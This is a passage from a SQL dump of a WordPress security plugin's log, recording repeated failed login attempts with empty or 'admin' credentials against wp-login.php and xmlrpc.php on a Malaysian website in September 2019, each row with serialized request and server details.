14:17:23',18256160,19554928,'https://bintara.com.my/xmlrpc.php',1,0,'186.202.161.191'),(24586,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"186.202.161.191\";s:11:\"REMOTE_PORT\";s:5:\"33151\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDq7UViJhUiKk@yAoeixwAAAYo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568729838.0803\";s:12:\"REQUEST_TIME\";s:10:\"1568729838\";}}','notice','2019-09-17 14:17:19','2019-09-17 14:17:18',17740040,19230984,'https://bintara.com.my/wp-login.php',1,0,'186.202.161.191'),(24585,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"51.38.128.211\";s:11:\"REMOTE_PORT\";s:5:\"35968\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDqIkViJhUiKk@yAoeiegAAAYw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568729635.0455\";s:12:\"REQUEST_TIME\";s:10:\"1568729635\";}}','notice','2019-09-17 14:13:56','2019-09-17 14:13:55',18255904,19554072,'https://bintara.com.my/xmlrpc.php',1,0,'51.38.128.211'),(24584,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"51.38.128.211\";s:11:\"REMOTE_PORT\";s:5:\"35516\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDqH0ViJhUiKk@yAoeidwAAAY8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568729631.7573\";s:12:\"REQUEST_TIME\";s:10:\"1568729631\";}}','notice','2019-09-17 14:13:53','2019-09-17 14:13:52',17739136,19229976,'https://bintara.com.my/wp-login.php',1,0,'51.38.128.211'),(24583,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"151.80.46.95\";s:11:\"REMOTE_PORT\";s:5:\"49029\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDo7kViJhUiKk@yAoeh9QAAAYk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568729326.5012\";s:12:\"REQUEST_TIME\";s:10:\"1568729326\";}}','notice','2019-09-17 14:08:47','2019-09-17 14:08:46',18256384,19556584,'https://bintara.com.my/xmlrpc.php',1,0,'151.80.46.95'),(24582,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"151.80.46.95\";s:11:\"REMOTE_PORT\";s:5:\"48711\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDo60ViJhUiKk@yAoeh9AAAAYs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568729323.6368\";s:12:\"REQUEST_TIME\";s:10:\"1568729323\";}}','notice','2019-09-17 14:08:45','2019-09-17 14:08:44',17904744,19229584,'https://bintara.com.my/wp-login.php',1,0,'151.80.46.95'),(24581,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"151.80.46.95\";s:11:\"REMOTE_PORT\";s:5:\"48711\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDo60ViJhUiKk@yAoeh9AAAAYs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568729323.6368\";s:12:\"REQUEST_TIME\";s:10:\"1568729323\";}}','notice','2019-09-17 14:08:45','2019-09-17 14:08:44',17743680,19229584,'https://bintara.com.my/wp-login.php',1,0,'151.80.46.95'),(24580,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"89.111.24.122\";s:11:\"REMOTE_PORT\";s:5:\"48990\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDnJ-qGIVx7CchTQw31WwAAARA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568728871.3903\";s:12:\"REQUEST_TIME\";s:10:\"1568728871\";}}','notice','2019-09-17 14:01:13','2019-09-17 14:01:11',18255904,19554072,'https://bintara.com.my/xmlrpc.php',1,0,'89.111.24.122'),(24579,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"89.111.24.122\";s:11:\"REMOTE_PORT\";s:5:\"48458\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDnJLPljmUbZi0RRr3pDAAAAhM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568728868.5301\";s:12:\"REQUEST_TIME\";s:10:\"1568728868\";}}','notice','2019-09-17 14:01:09','2019-09-17 14:01:08',17739736,19230904,'https://bintara.com.my/wp-login.php',1,0,'89.111.24.122'),(24578,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.151.61\";s:11:\"REMOTE_PORT\";s:5:\"39604\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDnC@XYZLg4KrmIkGgZcgAAAEc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568728843.7375\";s:12:\"REQUEST_TIME\";s:10:\"1568728843\";}}','notice','2019-09-17 14:00:45','2019-09-17 